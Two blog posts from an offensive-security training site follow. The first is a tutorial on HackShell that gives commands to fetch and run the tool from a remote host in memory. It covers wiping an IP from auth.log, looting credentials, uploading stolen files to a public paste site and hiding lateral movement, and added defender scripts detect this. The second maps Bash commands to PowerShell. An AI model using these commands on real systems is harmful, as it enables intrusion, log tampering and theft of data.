
Linux: HackShell – Bash For Hackers

Welcome back, aspiring cyberwarriors!

In one of our Linux Forensics articles we discussed how widespread Linux systems are today. Most of the internet quietly runs on Linux. Internet service providers rely on Linux for deep packet inspection. Websites are hosted on Linux servers. The majority of home and business routers use Linux-based firmware. Even when we think we are dealing with simple consumer hardware, there is often a modified Linux kernel working in the background. Many successful web attacks end with a Linux compromise rather than a Windows one. Once a Linux server is compromised, the internal network is exposed from the inside. Critical infrastructure systems also depend heavily on Linux. Gas stations, industrial control systems, and even CCTV cameras often run Linux or Linux-based embedded firmware.

Master OTW has an excellent series showing how cameras can be exploited and later used as proxies. Once an attacker controls such a device, it becomes a doorway into the organization. Cameras are typically reachable from almost everywhere in the segmented network so that staff can view them. When the camera is running cheap and vulnerable software, that convenience can turn into a backdoor that exposes the entire company. In many of our forensic investigations we have seen Linux-based devices like cameras, routers, and small appliances used as the first foothold. After gaining root access, attackers often deploy their favorite tools to enumerate the environment, collect configuration files, harvest credentials, and sometimes even modify PAM to maintain silent persistence.

So Bash is already a powerful friend to both administrators and attackers. But we can make it even more stealthy and hacker friendly. We are going to explore HackShell, a tool designed to upgrade your Bash environment when you are performing penetration testing. HackShell was developed by The Hacker’s Choice, a long-standing hacking research group known for producing creative security tools. The tool is actively maintained, loads entirely into memory, and does not need to write itself to disk. That helps reduce forensic artifacts and lowers the chance of triggering simple detections.

If you are a defender, this article will also be valuable. Understanding how tools like HackShell operate will help you recognize the techniques attackers use to stay low-noise and stealthy. Network traffic and behavioral traces produced by these tools can become intelligence signals that support your SIEM and threat detection programs.

Let’s get started.

Setting Up

Once a shell session has been established, HackShell can be loaded directly into memory by running either of the following commands:

bash$ > source <(curl -SsfL https://thc.org/hs)

Or this one:

bash$ > eval "$(curl -SsfL https://github.com/hackerschoice/hackshell/raw/main/hackshell.sh)"

[Figure: setting up HackShell]

You are all set. Once HackShell loads, it performs some light enumeration to collect details about the current environment. For example, you may see output identifying suspicious cron jobs or even detecting tools such as gs-netcat running as persistence. That early context already gives you a sense of what is happening on the host.

But if the compromised host does not have internet access, for example when it sits inside an air-gapped environment, you can manually copy and paste the contents of the HackShell script after moving to /dev/shm. On very old machines, or when you face compatibility issues, you may need to follow this sequence instead.

First run:

bash$ > bash -c 'source <(curl -SsfL https://thc.org/hs); exec bash'

And then follow it with:

bash$ > source <(curl -SsfL https://thc.org/hs)

Now we are ready to explore its capabilities.

Capabilities

The developers of HackShell clearly put a lot of thought into what a penetration tester might need during live operations. Many helpful functions are built directly into the shell. You can list these features using the xhelp command, and you can also request help on individual commands using xhelp followed by the command name.

[Figure: HackShell capabilities help menu]

We will walk through some of the most interesting ones. A key design principle you will notice is stealth. Many execution methods are chosen to minimize traces and reduce the amount of forensic evidence left behind.

Evasion

These commands will help you reduce your forensic artefacts.

xhome

This command temporarily sets your home directory to a randomized path under /dev/shm. This change affects only your current HackShell session and does not modify the environment for other users who log in. Placing files in /dev/shm is popular among attackers because /dev/shm is a memory-backed filesystem. That means its contents do not persist across reboots and often receive less attention from casual defenders.

bash$ > xhome

[Figure: HackShell xhome command]

For defenders reading this, it is wise to routinely review /dev/shm for suspicious files or scripts. Unexpected executable content here is frequently a red flag.
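As an added example (not part of HackShell or of this article), here is a small audit script that lists the kind of /dev/shm content a defender would want to see: executable files, files that start with a shebang, files with script extensions, and any process whose executable or working directory sits under /dev/shm. The directory argument exists so the file check can be pointed at any path.

```bash
#!/bin/sh
# Added example (not part of HackShell): audit a memory-backed directory such as
# /dev/shm for content that normally has no business being there.
# Works in POSIX sh; file names containing newlines are not handled.

# Print one line per suspicious file as "<reason><TAB><path>".
# Reasons: executable (mode bit set), shebang (starts with "#!"),
# script-ext (shell/script extension). Defaults to /dev/shm.
audit_shm_files() {
    dir="${1:-/dev/shm}"
    [ -d "$dir" ] || return 0
    find "$dir" -type f 2>/dev/null | while IFS= read -r f; do
        if [ -x "$f" ]; then
            printf 'executable\t%s\n' "$f"
            continue
        fi
        # Only the first two bytes are needed to spot a shebang
        if [ "$(head -c 2 "$f" 2>/dev/null)" = '#!' ]; then
            printf 'shebang\t%s\n' "$f"
            continue
        fi
        case "$f" in
            *.sh|*.bash|*.py|*.pl) printf 'script-ext\t%s\n' "$f" ;;
        esac
    done
}

# Number of suspicious files in a directory (0 when it does not exist).
audit_shm_count() {
    audit_shm_files "$1" | wc -l | tr -d ' '
}

# List processes whose executable or working directory is under /dev/shm.
# Reads /proc directly, so it needs no ps or other tools on the host.
audit_shm_procs() {
    for p in /proc/[0-9]*; do
        exe=$(readlink "$p/exe" 2>/dev/null || true)
        cwd=$(readlink "$p/cwd" 2>/dev/null || true)
        case "$exe" in /dev/shm/*) printf 'pid %s exe=%s\n' "${p##*/}" "$exe" ;; esac
        case "$cwd" in /dev/shm*) printf 'pid %s cwd=%s\n' "${p##*/}" "$cwd" ;; esac
    done
    return 0
}

# Stand-alone run: audit the real /dev/shm and the process table
audit_shm_files /dev/shm
audit_shm_procs
```

Run it from cron or a configuration-management job and alert on any output; an empty result is the expected state on most servers.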

xlog

When attackers connect over SSH, their login events typically appear in system authentication logs. On many Linux distributions, these are stored in auth.log. HackShell includes a helper to selectively remove traces from the log.

For example:

bash$ > xlog '1.2.3.4' /var/log/auth.log

xtmux

Tmux is normally used by administrators and power users to manage multiple terminal windows, keep sessions running after disconnects, and perform long-running tasks. Attackers abuse the same features. In several forensic cases we observed attackers wiping storage by launching destructive dd commands inside tmux sessions so that data erasure would continue even if the network dropped or they disconnected.

This command launches an invisible tmux session:

bash$ > xtmux

Enumeration and Privilege Escalation

Once you have shifted your home directory and addressed logs, you can begin to understand the system more deeply.

ws

The WhatServer command produces a detailed overview of the environment. It lists storage, active processes, logged-in users, open sockets, listening ports, and more. This gives you a situational awareness snapshot and helps you decide whether the machine is strategically valuable.

[Figure: HackShell ws command]

lpe

LinPEAS is a well-known privilege escalation auditing script. It is actively maintained, frequently updated, and widely trusted by penetration testers. HackShell integrates a command that runs LinPEAS directly in memory so the script does not need to be stored on disk.

bash$ > lpe

[Figures: HackShell lpe command and its results]

The script will highlight possible paths to privilege escalation. In the example environment we were already root, which meant the output was extremely rich. However, HackShell works well under any user account, making it useful at every stage of engagement.

hgrep

Credential hunting often involves searching through large numbers of configuration files or text logs. The hgrep command helps you search for keywords in a simple and direct way.

bash$ > hgrep pass

[Figure: HackShell hgrep]

This can speed up the discovery of passwords, tokens, keys, or sensitive references buried in files.

scan

Network awareness is critical during lateral movement. HackShell’s scan command provides straightforward scanning with greppable output. You can use it to check for services such as SMB, SSH, WMI, WINRM, and many others.

You can also search for the ports commonly associated with domain controllers, such as LDAP, Kerberos, and DNS, to identify Active Directory infrastructure. Once domain credentials are obtained, they can be used for enumeration and further testing. HTTP scanning is also useful for detecting vulnerable web services.

Example syntax:

bash$ > scan PORT IP

[Figure: HackShell scan command]

loot

For many testers, this may become the favorite command. loot searches through configuration files and known locations in an effort to extract stored credentials or sensitive data. It does not always find everything, especially when environments use custom paths or formats, but it is often a powerful starting point.

bash$ > loot

[Figure: looting files on Linux with HackShell]

If the first pass does not satisfy you:

bash$ > lootmore

When results are incomplete, combining loot with hgrep can help you manually hunt for promising strings and secrets.

Lateral Movement and Data Exfiltration

When credentials are discovered, the next step may involve testing access to other machines or collecting documents. It is important to emphasize legal responsibility here. Mishandling exfiltrated data can expose highly sensitive information to the internet, violating agreements.

tb

The tb command uploads content to termbin.com. Files uploaded this way become publicly accessible if someone guesses or brute forces the URL. This must be used with caution.

bash$ > tb secrets.txt

[Figure: HackShell tb command]

After you extract data, securely deleting the local copy is recommended.

bash$ > shred secrets.txt

[Figure: HackShell shred command]

xssh and xscp

These commands mirror the familiar SSH and SCP tools and are used for remote connections and secure copying. HackShell attempts to perform these actions in a way that minimizes exposure. Defenders are continuously improving monitoring, sometimes sending automatic alerts when new SSH sessions appear. If attackers move carelessly, they risk burning their foothold and triggering incident response.

Connect to another host:

bash$ > xssh root@IP

Upload a file to /tmp on the remote machine:

bash$ > xscp file root@IP:/tmp

Download a file from the remote machine to /tmp:

bash$ > xscp root@IP:/root/secrets.txt /tmp

Summary

HackShell is an example of how Bash can be transformed into a stealthy, feature-rich environment for penetration testing. There is still much more inside the tool waiting to be explored. If you are a defender, take time to study its code, understand how it loads, and identify the servers it contacts. These behaviors can be turned into Indicators of Compromise and fed into your SIEM to strengthen detection.
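Turning the loading behaviour shown in the Setting Up section into detection logic, as an added example that is not part of the article or of HackShell: the proxy log format below is a constructed, assumed one (timestamp, client IP, method, URL), and the indicators are only the two download locations the article itself shows, so adjust field positions and the indicator list for your own proxy or DNS logs.

```bash
#!/bin/sh
# Added example (not part of HackShell): two checks a SIEM rule could be built
# on, using only the download locations and loader shape shown in the article.
# Assumed log format: "<timestamp> <client-ip> <method> <url>" (constructed).

# Download locations the article shows HackShell being loaded from (lower-case).
HACKSHELL_IOCS='thc.org/hs github.com/hackerschoice/hackshell'

# Read proxy log lines on stdin and print "client-ip url" for every line whose
# URL contains one of the indicators, matched case-insensitively.
flag_hackshell_fetches() {
    awk -v iocs="$HACKSHELL_IOCS" '
        BEGIN { n = split(iocs, list, " ") }
        {
            url = tolower($4)
            for (i = 1; i <= n; i++)
                if (index(url, list[i]) > 0) { print $2, $4; break }
        }'
}

# Read recorded shell command lines on stdin (for example from a shell audit
# log) and print those shaped like the in-memory loaders shown in the article:
# a curl or wget fetch fed straight into source or eval.
flag_inmemory_loaders() {
    grep -iE '(source <\(|eval "\$\()[[:space:]]*(curl|wget)'
}

# Constructed sample proxy log for a stand-alone run (addresses are made up).
SAMPLE_PROXY='2024-01-01T10:00:01Z 10.0.0.5 GET https://www.example.com/index.html
2024-01-01T10:00:02Z 10.0.0.7 GET https://thc.org/hs
2024-01-01T10:00:03Z 10.0.0.9 GET https://github.com/hackerschoice/hackshell/raw/main/hackshell.sh
2024-01-01T10:00:04Z 10.0.0.5 GET https://THC.ORG/HS'

# Number of flagged lines in the sample log.
hackshell_fetch_count() {
    printf '%s\n' "$SAMPLE_PROXY" | flag_hackshell_fetches | wc -l | tr -d ' '
}

printf '%s\n' "$SAMPLE_PROXY" | flag_hackshell_fetches
```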

If ethical hacking and cyber operations excite you, you may enjoy our Cyberwarrior Path. This is a three-year training journey built around a two-tier education model. During the first eighteen months you progress through a rich library of beginner and intermediate courses that develop your skills step by step. Once those payments are complete, you unlock Subscriber Pro-level training that opens the door to advanced and specialized topics designed for our most dedicated learners. This structure was created because students asked for flexibility, and we listened. It allows you to keep growing and improving without carrying an unnecessary financial burden, while becoming the professional you want to be.

The post Linux: HackShell – Bash For Hackers first appeared on Hackers Arise.

PowerShell: Moving from Bash to PowerShell

Welcome back, hackers!

When moving from Bash to PowerShell, people often run into difficulties simply because they do not know which tools in PowerShell serve as equivalents and how to use them. For example, I personally like Bash for its straightforward logic. If you need to grab only certain lines from a text file, you know you can call on cat and grep. But when you try to type something similar in PowerShell, it often feels like hitting a wall. You know the logic, you know it should be just a one-liner, yet you get stuck on how to actually do it. That is exactly what we are going to sort out today.

This article serves as an addition to PowerShell for Hackers: Basics and aims to show more of PowerShell’s capabilities by mapping familiar Bash commands to their PowerShell equivalents. If you haven’t read PowerShell for Hackers: Basics, we highly recommend starting there. This guide is written for people who know the Linux command line and want practical examples for their workflows in PowerShell.

General Rules of the Game

Let’s start with the most basic, yet still very important, topic: working with variables. In Bash, declaring a variable is as simple as writing foo=1. In PowerShell, you need to add a dollar sign: $foo=1. To print the value of a variable to the screen, you can use the universal echo or the PowerShell-specific cmdlet Write-Host. Is it longer? Definitely. But the benefit is that with Write-Host you can control the output in interesting ways:

PS > Write-Host (2,4,6,8,10,12) -Separator "->" -ForegroundColor DarkMagenta -BackgroundColor White

[Figure: working with flags in PowerShell]

This snippet will print the sequence of numbers inside the parentheses, place a -> between them, and also change both the text and the background colors. For a quick throwaway script this isn’t necessary, but for a daily report it might be quite useful.

If you need to compare something, PowerShell has a full set of operators, familiar to anyone coming from Linux.

[Figure: working with PowerShell operators]

If comparison operators and logical conditions are more or less clear, let’s look at a very simple but practical example with data types. Suppose we want to measure the average response time from a website like google.com. To do this we need to send several pings and calculate the average. Here’s a short script:

Write-Host `n "Waiting for test ..."
$Avg = 0
$Site = "www.google.com"
$PingSite = Test-Connection -Count 5 $Site                      # five echo requests, returned as objects
$Avg = ($PingSite | Measure-Object ResponseTime -Average)        # average the ResponseTime property (Windows PowerShell 5.1; PowerShell 7 names it Latency)
$Calc = ($Avg.Average) -as [int]                                # cast to an integer for display
Clear-Host
Write-Host "Average response time to $Site is $Calc ms"

[Figure: working with PowerShell variables]

If we don’t cast the value to an integer, we get a floating-point number, which isn’t very convenient for this purpose.

This is one of the instances where a PowerShell command is actually stronger than the classic Linux ping. The Test-Connection cmdlet outputs structured objects that already contain response times, status, and other useful properties. That means you can pipe the results directly into tools like Measure-Object and do math on them without needing to parse text with awk or grep. In Linux, ping is text-based, so you often need extra commands to extract the numbers. PowerShell skips that step.

Aliases

To make PowerShell easier to use, you can create aliases. It’s worth checking the aliases already available on your system with:

PS > Get-Alias

[Figure: listing aliases]

Aliases can even point to programs. For example, let’s make an alias for launching the calculator:

PS > Set-Alias -Name calc -Value calc.exe

[Figure: setting a new alias in PowerShell]

Now typing calc will start the calculator. If you want your alias to represent a command with parameters, you need to wrap it in a function:

function AL01 { Test-Connection -Count 2 google.com }
Set-Alias ping AL01

Now when you type ping, it will perform two pings to google.com. To remove an alias, use:

PS > Remove-Item alias:ping

Note that once you close PowerShell, all aliases you created this way disappear. To keep them permanently, you need to save them in your profile. PowerShell actually has four possible profiles. You can see them with:

PS > $profile | Format-List -Force

[Figure: listing PowerShell profiles]

To check if they exist on your system:

PS > $profile.PSObject.Properties | Where-Object MemberType -eq NoteProperty | ForEach-Object { "$($_.Name): $(Test-Path $_.Value)" }

If a profile reports False, that file simply doesn’t exist. You can create it, for example, at this path:

PS > notepad.exe C:\Windows\System32\WindowsPowerShell\v1.0\profile.ps1

And add your aliases inside it:

function AL01 { Test-Connection -Count 2 google.com }
Set-Alias ping AL01

[Figure: creating a PowerShell profile]

After saving and restarting PowerShell, your aliases will load automatically.

One important note. By default, Windows blocks the execution of external scripts. This means your profile file might be ignored. To check the current policy, run:

PS > Get-ExecutionPolicy

Most likely it will return Restricted, which means all scripts are blocked. To allow your profile script to run, you need to open PowerShell as Administrator and set:

PS > Set-ExecutionPolicy Unrestricted

[Figure: setting execution policy to Unrestricted]

After confirmation, scripts will run normally, including your profile file.

[Figure: using aliases in PowerShell]

Going Deeper

Now let’s move on to the most popular Linux tools and their PowerShell equivalents, from simple to more advanced.

cd

Navigation between directories. You can use the familiar cd alias or the cmdlet Set-Location:

PS > Set-Location Windows

This moves you to the Windows folder in the current directory. PowerShell even lets you navigate the registry the same way:

PS > Set-Location -Path "HKLM:"

PS > Set-Location -Path "HKLM:\SOFTWARE\Microsoft\CTF"

[Figure: using cd in PowerShell]

ls

To view the contents of a directory, use ls, dir, or the cmdlet Get-ChildItem:

PS > Get-ChildItem C:\

[Figure: listing files in PowerShell]

This shows everything on the C: drive. To sort results by modification time (like ls -ltr in Linux):

PS > Get-ChildItem $env:USERPROFILE\Documents | Sort-Object -Property LastWriteTime

[Figure: using sort in PowerShell]

For recursive searches:

PS > Get-ChildItem -Path C:\ -Force -Recurse

mkdir

To create directories, use New-Item:

PS > New-Item -ItemType Directory -Name intel

Or to create a subfolder:

PS > New-Item -ItemType "directory" -Path "c:\intel\papers"

[Figure: creating directories with PowerShell]

You can even create a text file with content in one command:

PS > New-Item -Path . -Name "key.txt" -ItemType "file" -Value "HSDAF8KL"

[Figure: creating files with content in PowerShell]

touch

Creating files also uses New-Item:

PS > New-Item -ItemType "file" -Path "c:\temp\file.txt", "C:\intel\papers\classified.txt"

This makes two files in different folders.

cp

Copying files is done with Copy-Item:

PS > Copy-Item -Path C:\intel\classified.txt -Destination C:\important\

It also works over the network:

PS > Copy-Item -Path C:\key.txt -Destination '\\file-srv\f$\key.txt'

rm

Deleting files is Remove-Item. The dangerous rm -rf equivalent, with the target path in place of <path>, is:

PS > Remove-Item -Path <path> -Recurse -Force

Like in Linux, it’s one of the most dangerous commands. A single mistake can wipe entire directories. It’s a good practice to first preview what will be deleted with Get-ChildItem, or even rename files instead of deleting them to make recovery easier.

You can also delete by masks:

PS > Remove-Item *.txt

Or specific files:

PS > Remove-Item C:\dir1\records, C:\dir1\photos, C:\dir2\interrogations

find

To search for files, use Get-ChildItem with filters. For example:

PS > Get-ChildItem C:\ -Include *.exe -Recurse

This finds all .exe files on C:\, but you can also limit the depth and filter further:

PS > Get-ChildItem -Path "C:\Files\*.exe" -Filter "*software*" -Depth 2 -Exclude "*server*" -Recurse

Notice how flexible the filtering is. Often you don’t need regular expressions.

cat

To read files use Get-Content or gc:

PS > Get-Content -Path C:\case\script.txt

tail

To see the last ten lines of a file:

PS > Get-Content c:\logs\log.txt -Tail 10

To monitor in real time:

PS > Get-Content "C:\logs\log.txt" -Wait | Where { $_ -Match "Error" }

This shows new lines containing "Error" as they appear.

grep

PowerShell doesn’t have a perfect grep equivalent, but there are alternatives. To filter objects, use Where-Object.

List processes using more than 100 MB of memory:

PS > Get-Process | Where-Object { $_.WorkingSet -gt 104857600 }

[Figure: using grep in PowerShell]

For text searches, use Select-String to find the string that mentions your keyword:

PS > Select-String -Path C:\logs\*.log -Pattern "error"

Or combine with Get-Content:

PS > Get-Content -Path C:\scripts\script.txt | Select-String -Pattern "alias"

uname

To display system information:

PS > $Properties = 'Caption', 'CSName', 'Version', 'BuildType', 'OSArchitecture'; Get-CimInstance Win32_OperatingSystem | Select-Object $Properties | Format-Table -AutoSize

Longer than uname -a, but you can alias it if needed. At the end of the day, you don’t really use it much.

mkfs

To create filesystems, PowerShell has New-Volume and Format-Volume:

PS > New-Volume -StoragePoolName "CompanyData" -FriendlyName "TestVolume" -Size 10GB -ResiliencySettingName "Mirror" -FileSystem NTFS -AccessPath "M:" -ProvisioningType Fixed

Be careful, as misuse can destroy your data. Always test on a safe machine first.

ping

The classic ping equivalent is Test-Connection:

PS > Test-Connection google.com

cut

To extract only certain fields, use Select-Object. For example, to list text files in your user folder but only show names and sizes:

PS > Get-ChildItem $env:USERPROFILE -Filter "*.txt" | Select-Object -Property 'Name', 'Length'

man

The man equivalent is Get-Help:

PS > Get-Help Get-ChildItem

You can also use wildcards:

PS > Get-Help Get-*

Conclusion

As you can see, almost every Linux command has a worthy PowerShell counterpart. Some of them are less elegant or more verbose, but in return they often give you more power through structured objects and richer filtering. Bash and PowerShell approach the same problems from different angles. Bash is all about short, sharp one-liners, a language of quick hacks and piping small tools together. PowerShell takes more words to get going, but it pays you back with depth. Its cmdlets work with objects instead of plain text, which means more precision and flexibility. A job that takes three or four utilities strung together in Bash can sometimes be handled by a single cmdlet.

The transition isn’t painless. The syntax can feel verbose and the patterns unfamiliar. It looks like you’re doing more typing for the same result. In the end, it all comes down to habit and practice. PowerShell is essentially a full toolbox, while Bash is a handy pocket knife. The more you experiment and analyze, the more natural it will feel.

The post PowerShell: Moving from Bash to PowerShell first appeared on Hackers Arise.
